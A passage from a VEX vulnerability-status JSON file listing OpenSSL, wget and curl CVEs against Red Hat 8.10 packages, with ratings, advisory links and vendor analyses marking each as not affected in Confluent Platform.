          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ]
    },
    {
      "id": "CVE-2024-0727",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL\nto crash leading to a potential Denial of Service attack\n\nImpact summary: Applications loading files in the PKCS12 format from untrusted\nsources might terminate abruptly.\n\nA file in PKCS12 format can contain certificates and keys and may come from an\nuntrusted source. The PKCS12 specification allows certain fields to be NULL, but\nOpenSSL does not correctly check for this case. This can lead to a NULL pointer\ndereference that results in OpenSSL crashing. If an application processes PKCS12\nfiles from an untrusted source using the OpenSSL APIs then that application will\nbe vulnerable to this issue.\n\nOpenSSL APIs that are vulnerable to this are: PKCS12_parse(),\nPKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()\nand PKCS12_newpass().\n\nWe have also fixed a similar issue in SMIME_write_PKCS7(). However since this\nfunction is related to writing data we do not consider it security significant.\n\nThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-0727"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/03/11/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:9088"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-0727"
        },
        {
          "url": "https://bugzilla.redhat.com/2257571"
        },
        {
          "url": "https://bugzilla.redhat.com/2258502"
        },
        {
          "url": "https://bugzilla.redhat.com/2259944"
        },
        {
          "url": "https://bugzilla.redhat.com/2284243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257571"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258502"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259944"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2284243"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-277137.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-331112.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-769027.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-915275.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6129"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0727"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1298"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-9088.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:9088"
        },
        {
          "url": "https://github.com/advisories/GHSA-9v9h-cgj8-h64p"
        },
        {
          "url": "https://github.com/alexcrichton/openssl-src-rs/commit/add20f73b6b42be7451af2e1044d4e0e778992b2"
        },
        {
          "url": "https://github.com/github/advisory-database/pull/3472"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/09df4395b5071217b76dc7d3d2e630eb8c5a79c2"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/775acfdbd0c6af9ac855f34969cdab0c0c90844a"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c"
        },
        {
          "url": "https://github.com/openssl/openssl/pull/23362"
        },
        {
          "url": "https://github.com/pyca/cryptography/commit/3519591d255d4506fbcd0d04037d45271903c64d"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/03b3941d60c4bce58fab69a0c22377ab439bc0e8"
        },
        {
          "url": "https://github.openssl.org/openssl/extended-releases/commit/aebaa5883e31122b404e450732dc833dc9dee539"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-0727.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-9088.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00033.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/11/msg00000.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0727"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240208-0006"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240208-0006/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6622-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6632-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6709-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-0727"
        },
        {
          "url": "https://www.openssl.org/news/secadv/20240125.txt"
        }
      ],
      "published": "2024-01-26T09:15:07+00:00",
      "updated": "2026-06-17T06:54:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any Python code. That assures that the vulnerable code path in the affected library is not reachable. The Python libraries are only used for diagnostics."
      }
    },
    {
      "id": "CVE-2024-10524",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        918
      ],
      "description": "Applications that use Wget to access a remote resource using shorthand URLs and pass arbitrary user credentials in the URL are vulnerable. In these cases attackers can enter crafted credentials which will cause Wget to access an arbitrary host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-10524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/11/18/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-10524"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/wget.git/commit/?id=c419542d956a2607bbce5df64b9d378a8588d778"
        },
        {
          "url": "https://github.com/advisories/GHSA-mqrm-h2pw-9j9r"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10524"
        },
        {
          "url": "https://seclists.org/oss-sec/2024/q4/107"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-10524"
        }
      ],
      "published": "2024-11-19T15:15:06+00:00",
      "updated": "2026-06-17T06:55:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.19.5-12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-11053",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, curl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.\n\nThis flaw only manifests itself if the netrc file has an entry that matches\nthe redirect target hostname but the entry either omits just the password or\nomits both login and password.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-11053"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/12/11/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-11053"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
